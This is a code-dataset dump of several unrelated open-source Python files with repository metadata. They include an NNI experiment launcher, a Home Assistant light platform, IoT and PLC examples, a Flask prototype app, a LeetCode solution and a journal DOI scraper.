config_v2 = _validate_v2(config_yml, config_path)
schema = 2
try:
if schema == 1:
launch_experiment(args, config_v1, 'create', experiment_id, 1)
else:
launch_experiment(args, config_v2, 'create', experiment_id, 2)
except Exception as exception:
restServerPid = Experiments().get_all_experiments().get(experiment_id, {}).get('pid')
if restServerPid:
kill_command(restServerPid)
print_error(exception)
exit(1)
def manage_stopped_experiment(args, mode):
update_experiment()
experiments_config = Experiments()
experiments_dict = experiments_config.get_all_experiments()
experiment_id = None
if not args.id:
print_error('Please set experiment id! \nYou could use \'nnictl {0} id\' to {0} a stopped experiment!\n' \
'You could use \'nnictl experiment list --all\' to show all experiments!\n' \
'If your experiment is not started in current machine, you could specify experiment folder using ' \
'--experiment_dir argument'.format(mode))
exit(1)
else:
if experiments_dict.get(args.id) is None:
print_error('Id %s not exist!' % args.id)
exit(1)
if experiments_dict[args.id]['status'] != 'STOPPED':
print_error('Only stopped experiments can be {0}ed!'.format(mode))
exit(1)
experiment_id = args.id
print_normal('{0} experiment {1}...'.format(mode, experiment_id))
experiment_config = Config(experiment_id, experiments_dict[args.id]['logDir']).get_config()
experiments_config.update_experiment(args.id, 'port', args.port)
args.url_prefix = experiments_dict[args.id]['prefixUrl']
assert 'trainingService' in experiment_config or 'trainingServicePlatform' in experiment_config
try:
if 'trainingServicePlatform' in experiment_config:
experiment_config['logDir'] = experiments_dict[args.id]['logDir']
launch_experiment(args, experiment_config, mode, experiment_id, 1)
else:
experiment_config['experimentWorkingDirectory'] = experiments_dict[args.id]['logDir']
launch_experiment(args, experiment_config, mode, experiment_id, 2)
except Exception as exception:
restServerPid = Experiments().get_all_experiments().get(experiment_id, {}).get('pid')
if restServerPid:
kill_command(restServerPid)
print_error(exception)
exit(1)
def view_experiment(args):
if args.experiment_dir:
manage_external_experiment(args, 'view')
else:
manage_stopped_experiment(args, 'view')
def resume_experiment(args):
if args.experiment_dir:
manage_external_experiment(args, 'resume')
else:
manage_stopped_experiment(args, 'resume')
def manage_external_experiment(args, mode):
if not os.path.exists(args.experiment_dir):
print_error('Folder %s does not exist!' % args.experiment_dir)
exit(1)
if not os.path.isdir(args.experiment_dir):
print_error('Path %s is not folder directory!' % args.experiment_dir)
exit(1)
if args.id:
experiment_id = args.id
log_dir = args.experiment_dir
else:
print_normal('NNI can not detect experiment id in argument, will use last folder name as experiment id in experiment_dir argument.')
experiment_id = Path(args.experiment_dir).name
log_dir = str(Path(args.experiment_dir).parent)
if not experiment_id:
print_error("Please set experiment id argument, or add id as the last folder name in experiment_dir argument.")
exit(1)
args.url_prefix = None
experiment_config = Config(experiment_id, log_dir).get_config()
assert 'trainingService' in experiment_config or 'trainingServicePlatform' in experiment_config
try:
if 'trainingServicePlatform' in experiment_config:
experiment_config['logDir'] = log_dir
launch_experiment(args, experiment_config, mode, experiment_id, 1)
else:
experiment_config['experimentWorkingDirectory'] = log_dir
launch_experiment(args, experiment_config, mode, experiment_id, 2)
except Exception as exception:
print_error(exception)
exit(1)
| true | true |
f7261540ddd2002ae7277a840f8220797a974449 | 1,398 | py | Python | homeassistant/components/light/isy994.py | beschouten/home-assistant | f50c30bbbad4d92e342c8547630c63c0c7882803 | [
"MIT"
] | 1 | 2016-07-14T05:20:54.000Z | 2016-07-14T05:20:54.000Z | homeassistant/components/light/isy994.py | beschouten/home-assistant | f50c30bbbad4d92e342c8547630c63c0c7882803 | [
"MIT"
] | null | null | null | homeassistant/components/light/isy994.py | beschouten/home-assistant | f50c30bbbad4d92e342c8547630c63c0c7882803 | [
"MIT"
] | 1 | 2018-11-22T13:55:23.000Z | 2018-11-22T13:55:23.000Z | """
Support for ISY994 lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/isy994/
"""
import logging
from homeassistant.components.isy994 import (
HIDDEN_STRING, ISY, SENSOR_STRING, ISYDeviceABC)
from homeassistant.components.light import ATTR_BRIGHTNESS
from homeassistant.const import STATE_OFF, STATE_ON
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the ISY994 platform."""
logger = logging.getLogger(__name__)
devs = []
if ISY is None or not ISY.connected:
logger.error('A connection has not been made to the ISY controller.')
return False
# Import dimmable nodes
for (path, node) in ISY.nodes:
if node.dimmable and SENSOR_STRING not in node.name:
if HIDDEN_STRING in path:
node.name += HIDDEN_STRING
devs.append(ISYLightDevice(node))
add_devices(devs)
class ISYLightDevice(ISYDeviceABC):
"""Representation of a ISY light."""
_domain = 'light'
_dtype = 'analog'
_attrs = {ATTR_BRIGHTNESS: 'value'}
_onattrs = [ATTR_BRIGHTNESS]
_states = [STATE_ON, STATE_OFF]
def _attr_filter(self, attr):
"""Filter brightness out of entity while off."""
if ATTR_BRIGHTNESS in attr and not self.is_on:
del attr[ATTR_BRIGHTNESS]
return attr
| 29.125 | 77 | 0.690272 | import logging
from homeassistant.components.isy994 import (
HIDDEN_STRING, ISY, SENSOR_STRING, ISYDeviceABC)
from homeassistant.components.light import ATTR_BRIGHTNESS
from homeassistant.const import STATE_OFF, STATE_ON
def setup_platform(hass, config, add_devices, discovery_info=None):
logger = logging.getLogger(__name__)
devs = []
if ISY is None or not ISY.connected:
logger.error('A connection has not been made to the ISY controller.')
return False
for (path, node) in ISY.nodes:
if node.dimmable and SENSOR_STRING not in node.name:
if HIDDEN_STRING in path:
node.name += HIDDEN_STRING
devs.append(ISYLightDevice(node))
add_devices(devs)
class ISYLightDevice(ISYDeviceABC):
_domain = 'light'
_dtype = 'analog'
_attrs = {ATTR_BRIGHTNESS: 'value'}
_onattrs = [ATTR_BRIGHTNESS]
_states = [STATE_ON, STATE_OFF]
def _attr_filter(self, attr):
if ATTR_BRIGHTNESS in attr and not self.is_on:
del attr[ATTR_BRIGHTNESS]
return attr
| true | true |
f72615697ea7f0f72fe65505596ea4f2e3766a64 | 879 | py | Python | BAIT2123 Internet Of Things/Practical/Practical 7/test10.py | loozixuan/SoftwareSystemsDevelopment-Y2S1 | 98c74d191ad5655277b28849d0f63cd0400cee25 | [
"MIT"
] | 3 | 2021-12-22T11:23:45.000Z | 2022-01-06T04:31:08.000Z | BAIT2123 Internet Of Things/Practical/Practical 7/test10.py | loozixuan/SoftwareSystemsDevelopment-Y2S1 | 98c74d191ad5655277b28849d0f63cd0400cee25 | [
"MIT"
] | null | null | null | BAIT2123 Internet Of Things/Practical/Practical 7/test10.py | loozixuan/SoftwareSystemsDevelopment-Y2S1 | 98c74d191ad5655277b28849d0f63cd0400cee25 | [
"MIT"
] | null | null | null | #from time import *
from grovepi import *
from paho.mqtt.client import *
buzzer = 3
pinMode(buzzer, "OUTPUT")
MQTT_BROKER = "192.168.56.1" #The ip address will be vary based on where and how you connect to the Internet
#MQTT_BROKER = "broker.emqx.io" #using public mqtt broker to act as subsriber
MQTT_TOPIC = "test"
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
client.subscribe(MQTT_TOPIC)
def on_message(client, userdata, msg):
print(msg.topic + " " + str(msg.payload))
try:
i = int(msg.payload)
print(i)
if i > 0 and i < 256:
analogWrite(buzzer, i)
except:
analogWrite(buzzer, 0)
client = Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect(MQTT_BROKER, 1883, 60)
client.loop_forever() | 29.3 | 109 | 0.653015 |
from grovepi import *
from paho.mqtt.client import *
buzzer = 3
pinMode(buzzer, "OUTPUT")
MQTT_BROKER = "192.168.56.1"
userdata, flags, rc):
print("Connected with result code " + str(rc))
client.subscribe(MQTT_TOPIC)
def on_message(client, userdata, msg):
print(msg.topic + " " + str(msg.payload))
try:
i = int(msg.payload)
print(i)
if i > 0 and i < 256:
analogWrite(buzzer, i)
except:
analogWrite(buzzer, 0)
client = Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect(MQTT_BROKER, 1883, 60)
client.loop_forever() | true | true |
f7261569a905f945bb952e0e026fd7beb779ab12 | 491 | py | Python | examples/10_write_simple.py | drbitboy/pylogix | 6204f8e288276f407763d56fa0801355daf115a6 | [
"Apache-2.0"
] | 350 | 2016-07-26T20:50:26.000Z | 2022-03-28T09:22:33.000Z | examples/10_write_simple.py | drbitboy/pylogix | 6204f8e288276f407763d56fa0801355daf115a6 | [
"Apache-2.0"
] | 175 | 2016-11-16T21:39:25.000Z | 2022-03-15T04:40:00.000Z | examples/10_write_simple.py | drbitboy/pylogix | 6204f8e288276f407763d56fa0801355daf115a6 | [
"Apache-2.0"
] | 174 | 2016-07-25T20:51:37.000Z | 2022-03-30T01:29:03.000Z | '''
the following import is only necessary because eip is not in this directory
'''
import sys
sys.path.append('..')
'''
The simplest example of writing a tag from a PLC
NOTE: You only need to call .Close() after you are done exchanging
data with the PLC. If you were going to read/write in a loop or read/write
more tags, you wouldn't want to call .Close() every time.
'''
from pylogix import PLC
comm = PLC()
comm.IPAddress = '192.168.1.9'
comm.Write('CurrentScreen', 10)
comm.Close()
| 24.55 | 75 | 0.723014 | import sys
sys.path.append('..')
from pylogix import PLC
comm = PLC()
comm.IPAddress = '192.168.1.9'
comm.Write('CurrentScreen', 10)
comm.Close()
| true | true |
f7261575ae40a5abf038212e2c31908273819413 | 745 | py | Python | app/urls.py | forestbaba/recipe-app-api | 72471dd6a8ad5993a71ae6648026d0d1def5d03d | [
"MIT"
] | 11 | 2018-06-19T01:32:59.000Z | 2022-01-28T13:41:20.000Z | app/urls.py | forestbaba/recipe-app-api | 72471dd6a8ad5993a71ae6648026d0d1def5d03d | [
"MIT"
] | 8 | 2019-06-11T02:44:04.000Z | 2022-02-10T11:55:20.000Z | app/urls.py | forestbaba/recipe-app-api | 72471dd6a8ad5993a71ae6648026d0d1def5d03d | [
"MIT"
] | 2 | 2020-07-04T14:14:46.000Z | 2021-10-04T11:22:50.000Z | """app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| 33.863636 | 77 | 0.707383 | from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| true | true |
f72615d8349f0df9ace6524c51601bcc14b49239 | 1,472 | py | Python | toTheMoon/leetcode_115_DistinctSubsequences.py | jercas/offer66-leetcode-newcode | a2e5256f27dbfb23fc34119fc857cd9b00e28c03 | [
"MIT"
] | null | null | null | toTheMoon/leetcode_115_DistinctSubsequences.py | jercas/offer66-leetcode-newcode | a2e5256f27dbfb23fc34119fc857cd9b00e28c03 | [
"MIT"
] | null | null | null | toTheMoon/leetcode_115_DistinctSubsequences.py | jercas/offer66-leetcode-newcode | a2e5256f27dbfb23fc34119fc857cd9b00e28c03 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Apr 15 15:37:49 2019
@author: jercas
"""
"""
leetcode-115: 不同的子序列 HARD
'动态规划' '字符串'
给定一个字符串 S 和一个字符串 T,计算在 S 的子序列中 T 出现的个数。
一个字符串的一个子序列是指,通过删除一些(也可以不删除)字符且不干扰剩余字符相对位置所组成的新字符串。
(例如,"ACE" 是 "ABCDE" 的一个子序列,而 "AEC" 不是)
___ 0
|true
i < j ? - ____ 1 ____ sum(i-1, j)
|___|j==0 |false
|____ S[i] == T[j] ? -
|____ sum(i-1, j) + sum(i-1,j-1)
"""
class Solution:
def numDistinct(self, s: str, t: str) -> int:
dictTimes = {}
dictChars = {}
for i in range(len(t)):
if t[i] in dictChars:
dictChars[t[i]].append(t[:i])
else:
dictChars[t[i]] = [t[:i]]
for i in range(1, len(t)+1):
dictTimes[t[:i]] = 0
dictTimes[''] = 1
for char in s:
if char in dictChars:
for c in dictChars[char][::-1]:
if dictTimes[c] > 0:
dictTimes[c+char] += dictTimes[c]
print(dictChars, '\n',dictTimes)
return dictTimes[t]
if __name__ == "__main__":
S = ["rabbbit", "babgbag"]
T = ["rabbit", "bag"]
A = [3, 5]
solution = Solution()
for i in range(len(S)):
if solution.numDistinct(S[i], T[i]) == A[i]:
print("AC") | 29.44 | 75 | 0.432745 |
class Solution:
def numDistinct(self, s: str, t: str) -> int:
dictTimes = {}
dictChars = {}
for i in range(len(t)):
if t[i] in dictChars:
dictChars[t[i]].append(t[:i])
else:
dictChars[t[i]] = [t[:i]]
for i in range(1, len(t)+1):
dictTimes[t[:i]] = 0
dictTimes[''] = 1
for char in s:
if char in dictChars:
for c in dictChars[char][::-1]:
if dictTimes[c] > 0:
dictTimes[c+char] += dictTimes[c]
print(dictChars, '\n',dictTimes)
return dictTimes[t]
if __name__ == "__main__":
S = ["rabbbit", "babgbag"]
T = ["rabbit", "bag"]
A = [3, 5]
solution = Solution()
for i in range(len(S)):
if solution.numDistinct(S[i], T[i]) == A[i]:
print("AC") | true | true |
f72615e0cd1ac3bf0fced183806639408d1edf2d | 3,061 | py | Python | getdoi/getDOIFromURL/science.py | YutoMizutani/getdoi | cf4e1a2bebe2d6cd9f534221a965d6153974f495 | [
"MIT"
] | null | null | null | getdoi/getDOIFromURL/science.py | YutoMizutani/getdoi | cf4e1a2bebe2d6cd9f534221a965d6153974f495 | [
"MIT"
] | null | null | null | getdoi/getDOIFromURL/science.py | YutoMizutani/getdoi | cf4e1a2bebe2d6cd9f534221a965d6153974f495 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# === About ============================================================================================================
"""
science.py
Copyright © 2017 Yuto Mizutani.
This software is released under the MIT License.
Version: 1.0.0
TranslateAuthors: Yuto Mizutani
E-mail: yuto.mizutani.dev@gmail.com
Website: http://operantroom.com
Created: 2017/12/09
Device: MacBook Pro (Retina, 13-inch, Mid 2015)
OS: macOS Serria version 10.12.6
IDE: PyCharm Community Edition 2017.2.4
Python: 3.6.1
"""
# --- References ---
# --- notes ---
# --- Information ---
# --- Circumstances ---
# === import ===========================================================================================================
""" Standard library """
""" Third party library """
""" Local library """
from .gettableDOI import GettableDOI
from getdoi.scraping.beautifulSoupModel import BeautifulSoupModelImpl
# === CONSTANTS ========================================================================================================
# === User Parameters ==================================================================================================
# === variables ========================================================================================================
# ======================================================================================================================
class Science(GettableDOI):
# http://science.sciencemag.org/content/309/5732/3106
# 10.1126/science.1114519
# -- constants --
JOURNAL_URL = 'science.sciencemag.org'
JOURNAL_STR = 'Science'
DOI_KEY = 'DOI: '
DOI_URL = "https://doi.org/"
DOI_STR = 'doi: '
META_KEY = 'name'
META_ID = 'citation_doi'
# natureは平文にdoi:10.1038/79951と記載されているのみである。
# -- controller --
def get(self, *, url)->str or None:
return self.get_url(url=url)
def get_url(self, *, url)->str or None:
"""return a full URL link"""
"""doiを読み込む。doiはmeta内である。"""
soup = BeautifulSoupModelImpl()
raw_doi = soup.get_meta_content(url=url, key=self.META_KEY, id=self.META_ID)
# print(raw_doi)
if raw_doi is not None:
doi_url = self.__translate_url(raw_doi=raw_doi)
return doi_url
else:
print('Any DOI found from {journal} ({link})'.format(journal=self.JOURNAL_STR, link=url))
return None
def get_prev_format(self, *, url)->str or None:
"""doi:[space] [doinumber]"""
doi_url = self.get_url(url=url)
if doi_url is None:
return None
else:
return self.__translate_prev_format(doi_url=doi_url)
# -- translator --
def __translate_url(self, *, raw_doi):
"""10.1126/science.1114519からhttps://dx.doi.org/を加える。"""
return self.DOI_URL+raw_doi
def __translate_prev_format(self, *, doi_url):
"""https://doi.org/10.1126/science.1114519からhttps://doi.org/を引きdoi: を加える。"""
return self.DOI_STR+doi_url.replace(self.DOI_URL, '')
| 32.913978 | 120 | 0.49951 |
from .gettableDOI import GettableDOI
from getdoi.scraping.beautifulSoupModel import BeautifulSoupModelImpl
class Science(GettableDOI):
JOURNAL_URL = 'science.sciencemag.org'
JOURNAL_STR = 'Science'
DOI_KEY = 'DOI: '
DOI_URL = "https://doi.org/"
DOI_STR = 'doi: '
META_KEY = 'name'
META_ID = 'citation_doi'
def get(self, *, url)->str or None:
return self.get_url(url=url)
def get_url(self, *, url)->str or None:
soup = BeautifulSoupModelImpl()
raw_doi = soup.get_meta_content(url=url, key=self.META_KEY, id=self.META_ID)
if raw_doi is not None:
doi_url = self.__translate_url(raw_doi=raw_doi)
return doi_url
else:
print('Any DOI found from {journal} ({link})'.format(journal=self.JOURNAL_STR, link=url))
return None
def get_prev_format(self, *, url)->str or None:
doi_url = self.get_url(url=url)
if doi_url is None:
return None
else:
return self.__translate_prev_format(doi_url=doi_url)
def __translate_url(self, *, raw_doi):
return self.DOI_URL+raw_doi
def __translate_prev_format(self, *, doi_url):
return self.DOI_STR+doi_url.replace(self.DOI_URL, '')
| true | true |
f72616177243550a1e3e7b68785b0d0fd43a39d3 | 8,412 | py | Python | Intent Recognition Protoype/app.py | AndBuch/intent-recognition-for-dialogs | 1a0bdfc8f36cf31e097a662c86f671bb5c820bc1 | [
"MIT"
] | null | null | null | Intent Recognition Protoype/app.py | AndBuch/intent-recognition-for-dialogs | 1a0bdfc8f36cf31e097a662c86f671bb5c820bc1 | [
"MIT"
] | null | null | null | Intent Recognition Protoype/app.py | AndBuch/intent-recognition-for-dialogs | 1a0bdfc8f36cf31e097a662c86f671bb5c820bc1 | [
"MIT"
] | null | null | null | from flask import Flask, render_template, url_for, request, redirect, session
from flask_sqlalchemy import SQLAlchemy
import uuid
import wave
from flask_socketio import emit, SocketIO
from datetime import datetime
import database_custom
import os
# Set this variable to "threading", "eventlet" or "gevent" to test the
# different async modes, or leave it set to None for the application to choose
# the best option based on installed packages.
async_mode = None
# Directory path
dir_path = os.path.dirname(os.path.realpath(__file__))
# Define app/ reference file
app = Flask(__name__)
app.secret_key = "hello"
socketio = SocketIO(app)
# Define the names of the databases and create the databases (saved into same directory as app.py)
db_names = ['main', 'user']
db_keys = {'user'}
database_custom.CreateDatabase(db_names)
# Bind databases to application
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///main.db' # first database to connect to
app.config['SQLALCHEMY_BINDS'] = {'user': 'sqlite:///user.db'} # dictionary that holds additional databases
db = SQLAlchemy(app) # initalize DB with app
# Create tables and their columns
class Main(db.Model):
id = db.Column(db.Integer, primary_key = True)
content = db.Column(db.String(200), nullable = False) # String(length in character), nullable = can be empty?
completed = db.Column(db.Integer, default = 0)
date_created = db.Column(db.DateTime, default = datetime.utcnow) # Default = if entry is created automatically create datetime
def __repr__(self):
return '<Task %r>' %self.id
class User(db.Model):
__bind_key__ = 'user'
id = db.Column(db.Integer, primary_key = True)
users = db.Column(db.String(200), nullable = False)
password = db.Column(db.String(200), nullable = False)
date_created = db.Column(db.DateTime, default = datetime.utcnow)
database_custom.CreateTables(db) # Create tables using the function in database.py
'''
----------------------------------------------------------------------------------
INDEX-Page
----------------------------------------------------------------------------------
'''
@app.route('/', methods = ['POST', 'GET'])
# Define the functions for the index page
def index():
if request.method == 'POST':
task_content = request.form['content']
new_task = Main(content = task_content)
try:
db.session.add(new_task)
db.session.commit()
return redirect('/')
except:
return "There was an issue with your request"
else:
tasks = Main.query.order_by(Main.date_created).all()
return render_template('index.html', tasks = tasks)
return render_template('index.html')
'''
----------------------------------------------------------------------------------
HOME-Page
----------------------------------------------------------------------------------
'''
@app.route('/home', methods = ['POST', 'GET'])
# Define the functions for the home page
def home():
if request.method == 'POST':
user = request.form['user']
password = request.form['password']
session['user'] = user
session['password'] = password
return redirect(url_for("portallogin"))
else:
tasks = Main.query.order_by(Main.date_created).all()
return render_template('home.html', tasks = tasks)
return render_template('home.html')
'''
----------------------------------------------------------------------------------
PORTAL-Login Procedure
----------------------------------------------------------------------------------
'''
@app.route('/portallogin', methods = ['POST', 'GET'])
# Define the functions for the portal page
def portallogin():
if "user" in session:
user = session["user"]
password = session['password']
# Check if user is in database and get first row of database and select the password
found_user = User.query.filter_by(users = user).first()
if found_user and password == found_user.password:
session["login"] = True
return redirect(url_for('portalrecord'))
else:
return redirect(url_for('home'))
else:
return redirect(url_for('home'))
'''
----------------------------------------------------------------------------------
PORTAL-Dialog Player Page
----------------------------------------------------------------------------------
'''
@app.route('/portal_record', methods = ['POST', 'GET'])
# Define the functions for the portal page
def portalrecord():
if "user" in session and session["login"] == True:
return render_template('portal.html')
else:
return redirect(url_for('home'))
@app.route('/uploads', methods=['POST'])
def save_audio():
print("got new audio file")
rawAudio = request.get_data()
audioFile = open('RecordedFile.wav', 'wb')
audioFile.write(rawAudio)
audioFile.close()
'''
----------------------------------------------------------------------------------
PORTAL-Dialog Player Page
----------------------------------------------------------------------------------
'''
@app.route('/portal_dialog', methods = ['POST', 'GET'])
# Define the functions for the portal page
def portaldialog():
if "user" in session and session["login"] == True:
return render_template('portal_dialog player.html')
else:
return redirect(url_for('home'))
'''
----------------------------------------------------------------------------------
PORTAL-Statistics Page
----------------------------------------------------------------------------------
'''
@app.route('/portal_statistics', methods = ['POST', 'GET'])
# Define the functions for the portal page
def portalstatistics():
if "user" in session and session["login"] == True:
return render_template('portal_statistics.html')
else:
return redirect(url_for('home'))
'''
----------------------------------------------------------------------------------
PORTAL-Intent Checker Page
----------------------------------------------------------------------------------
'''
@app.route('/portal_check', methods = ['POST', 'GET'])
# Define the functions for the portal page
def portalcheck():
if "user" in session and session["login"] == True:
return render_template('portal_intent checker.html')
else:
return redirect(url_for('home'))
'''
----------------------------------------------------------------------------------
PORTAL-Logout Procedure
----------------------------------------------------------------------------------
'''
@app.route('/portallogout', methods = ['POST', 'GET'])
# Define the functions for the portal page
def portallogout():
session.pop("user", None)
return redirect(url_for('home'))
'''
----------------------------------------------------------------------------------
AUDIO-Recorder
----------------------------------------------------------------------------------
'''
@socketio.on('start-recording')
def start_recording(options):
print('started recording')
"""Start recording audio from the client."""
# Create new audio file in folder /audio
id = uuid.uuid4().hex # server-side filename
session['wavename'] = id + '.wav'
audio_path = dir_path + '/audio/' + session['wavename']
wf = wave.open(audio_path, 'wb')
# Create new audio format
wf.setnchannels(options.get('numChannels', 1))
wf.setsampwidth(options.get('bps', 16) // 8)
wf.setframerate(options.get('fps', 44100))
session['wavefile'] = wf
@socketio.on('write-audio')
def write_audio(data):
print("write data")
"""Write a chunk of audio from the client."""
session['wavefile'].writeframes(data)
@socketio.on('end-recording')
def end_recording():
print("end recording")
"""Stop recording audio from the client."""
emit('add-wavefile', audio_path = dir_path + '/audio/' + session['wavename'])
session['wavefile'].close()
del session['wavefile']
del session['wavename']
'''
----------------------------------------------------------------------------------
For debugging
----------------------------------------------------------------------------------
'''
if __name__ == "__main__":
socketio.run(app, debug=True)
| 30.042857 | 133 | 0.526153 | from flask import Flask, render_template, url_for, request, redirect, session
from flask_sqlalchemy import SQLAlchemy
import uuid
import wave
from flask_socketio import emit, SocketIO
from datetime import datetime
import database_custom
import os
async_mode = None
dir_path = os.path.dirname(os.path.realpath(__file__))
app = Flask(__name__)
app.secret_key = "hello"
socketio = SocketIO(app)
db_names = ['main', 'user']
db_keys = {'user'}
database_custom.CreateDatabase(db_names)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///main.db'
app.config['SQLALCHEMY_BINDS'] = {'user': 'sqlite:///user.db'}
db = SQLAlchemy(app)
class Main(db.Model):
id = db.Column(db.Integer, primary_key = True)
content = db.Column(db.String(200), nullable = False)
completed = db.Column(db.Integer, default = 0)
date_created = db.Column(db.DateTime, default = datetime.utcnow)
def __repr__(self):
return '<Task %r>' %self.id
class User(db.Model):
__bind_key__ = 'user'
id = db.Column(db.Integer, primary_key = True)
users = db.Column(db.String(200), nullable = False)
password = db.Column(db.String(200), nullable = False)
date_created = db.Column(db.DateTime, default = datetime.utcnow)
database_custom.CreateTables(db)
@app.route('/', methods = ['POST', 'GET'])
def index():
if request.method == 'POST':
task_content = request.form['content']
new_task = Main(content = task_content)
try:
db.session.add(new_task)
db.session.commit()
return redirect('/')
except:
return "There was an issue with your request"
else:
tasks = Main.query.order_by(Main.date_created).all()
return render_template('index.html', tasks = tasks)
return render_template('index.html')
@app.route('/home', methods = ['POST', 'GET'])
def home():
if request.method == 'POST':
user = request.form['user']
password = request.form['password']
session['user'] = user
session['password'] = password
return redirect(url_for("portallogin"))
else:
tasks = Main.query.order_by(Main.date_created).all()
return render_template('home.html', tasks = tasks)
return render_template('home.html')
@app.route('/portallogin', methods = ['POST', 'GET'])
def portallogin():
if "user" in session:
user = session["user"]
password = session['password']
found_user = User.query.filter_by(users = user).first()
if found_user and password == found_user.password:
session["login"] = True
return redirect(url_for('portalrecord'))
else:
return redirect(url_for('home'))
else:
return redirect(url_for('home'))
@app.route('/portal_record', methods = ['POST', 'GET'])
def portalrecord():
if "user" in session and session["login"] == True:
return render_template('portal.html')
else:
return redirect(url_for('home'))
@app.route('/uploads', methods=['POST'])
def save_audio():
print("got new audio file")
rawAudio = request.get_data()
audioFile = open('RecordedFile.wav', 'wb')
audioFile.write(rawAudio)
audioFile.close()
@app.route('/portal_dialog', methods = ['POST', 'GET'])
def portaldialog():
if "user" in session and session["login"] == True:
return render_template('portal_dialog player.html')
else:
return redirect(url_for('home'))
@app.route('/portal_statistics', methods = ['POST', 'GET'])
def portalstatistics():
if "user" in session and session["login"] == True:
return render_template('portal_statistics.html')
else:
return redirect(url_for('home'))
@app.route('/portal_check', methods = ['POST', 'GET'])
def portalcheck():
if "user" in session and session["login"] == True:
return render_template('portal_intent checker.html')
else:
return redirect(url_for('home'))
@app.route('/portallogout', methods = ['POST', 'GET'])
def portallogout():
session.pop("user", None)
return redirect(url_for('home'))
@socketio.on('start-recording')
def start_recording(options):
print('started recording')
id = uuid.uuid4().hex
session['wavename'] = id + '.wav'
audio_path = dir_path + '/audio/' + session['wavename']
wf = wave.open(audio_path, 'wb')
wf.setnchannels(options.get('numChannels', 1))
wf.setsampwidth(options.get('bps', 16) // 8)
wf.setframerate(options.get('fps', 44100))
session['wavefile'] = wf
@socketio.on('write-audio')
def write_audio(data):
print("write data")
session['wavefile'].writeframes(data)
@socketio.on('end-recording')
def end_recording():
print("end recording")
emit('add-wavefile', audio_path = dir_path + '/audio/' + session['wavename'])
session['wavefile'].close()
del session['wavefile']
del session['wavename']
if __name__ == "__main__":
socketio.run(app, debug=True)
| true | true |
f72616de29779e50da24b38a39bb7a37b89fe8df | 325 | py | Python | p_var.py | PacktPublishing/Packt | 790c5a01eba5979ba4f22392538197981cb10447 | [
"MIT"
] | null | null | null | p_var.py | PacktPublishing/Packt | 790c5a01eba5979ba4f22392538197981cb10447 | [
"MIT"
] | null | null | null | p_var.py | PacktPublishing/Packt | 790c5a01eba5979ba4f22392538197981cb10447 | [
"MIT"
] | null | null | null | class car:
__topspeed = 0
__name=""
def __init__(self):
self.__topspeed=250
self.name="SAM"
def drive(self):
print("Drive Top Speed=" +str(self.__topspeed))
def setTopSpeed(self,speed):
self.__topspeed=speed
volvo=car()
volvo.drive()
volvo.setTopSpeed(380)
volvo.drive() | 17.105263 | 55 | 0.627692 | class car:
__topspeed = 0
__name=""
def __init__(self):
self.__topspeed=250
self.name="SAM"
def drive(self):
print("Drive Top Speed=" +str(self.__topspeed))
def setTopSpeed(self,speed):
self.__topspeed=speed
volvo=car()
volvo.drive()
volvo.setTopSpeed(380)
volvo.drive() | true | true |
f72616faa0a3c1aea2a3297fcae2f7c444a7134b | 12,820 | py | Python | octopus/modules/oag/client.py | CottageLabs/magnificent-octopus-oacwellcome-fork | b1c8c412cf9a3fe66fca1c8e92ed074c9821663e | [
"Apache-2.0"
] | 2 | 2016-02-22T04:31:30.000Z | 2021-08-03T23:58:36.000Z | octopus/modules/oag/client.py | CottageLabs/magnificent-octopus-oacwellcome-fork | b1c8c412cf9a3fe66fca1c8e92ed074c9821663e | [
"Apache-2.0"
] | 9 | 2015-01-04T14:00:05.000Z | 2021-12-13T19:35:07.000Z | octopus/modules/oag/client.py | CottageLabs/magnificent-octopus-oacwellcome-fork | b1c8c412cf9a3fe66fca1c8e92ed074c9821663e | [
"Apache-2.0"
] | 3 | 2016-09-09T13:39:45.000Z | 2018-02-19T14:23:12.000Z | from datetime import datetime, timedelta
import json, requests, time, sys, uuid
from copy import deepcopy
from octopus.core import app
from octopus.lib import http
class RequestState(object):
_timestamp_format = "%Y-%m-%dT%H:%M:%SZ"
def __init__(self, identifiers, timeout=None, back_off_factor=None, max_back_off=None, max_retries=None, batch_size=None, start=None):
self.id = uuid.uuid4().hex
self.success = {}
self.error = {}
self.pending = {}
self.maxed = {}
self.success_buffer = []
self.error_buffer = []
self.start = datetime.utcnow() if start is None else start
if timeout is None:
timeout = app.config.get("OAG_STATE_DEFAULT_TIMEOUT")
self.timeout = self.start + timedelta(seconds=timeout) if timeout is not None else None
if back_off_factor is None:
back_off_factor = app.config.get("OAG_STATE_BACK_OFF_FACTOR", 1)
self.back_off_factor = back_off_factor
if max_back_off is None:
max_back_off = app.config.get("OAG_STATE_MAX_BACK_OFF", 120)
self.max_back_off = max_back_off
if max_retries is None:
max_retries = app.config.get("OAG_STATE_MAX_RETRIES", None)
self.max_retries = max_retries
if batch_size is None:
batch_size = app.config.get("OAG_STATE_BATCH_SIZE", 1000)
self.batch_size = batch_size
for ident in identifiers:
self.pending[ident] = {"init" : self.start, "due" : self.start, "requested" : 0}
def print_parameters(self):
params = "Timeout: " + str(self.timeout) + "\n"
params += "Back Off Factor: " + str(self.back_off_factor) + "\n"
params += "Max Back Off: " + str(self.max_back_off) + "\n"
params += "Max Tries per Identifier: " + str(self.max_retries) + "\n"
params += "Batch Size: " + str(self.batch_size)
return params
def print_status_report(self):
status = str(len(self.success.keys())) + " received; " + \
str(len(self.error.keys())) + " errors; " + \
str(len(self.pending.keys())) + " pending; " + \
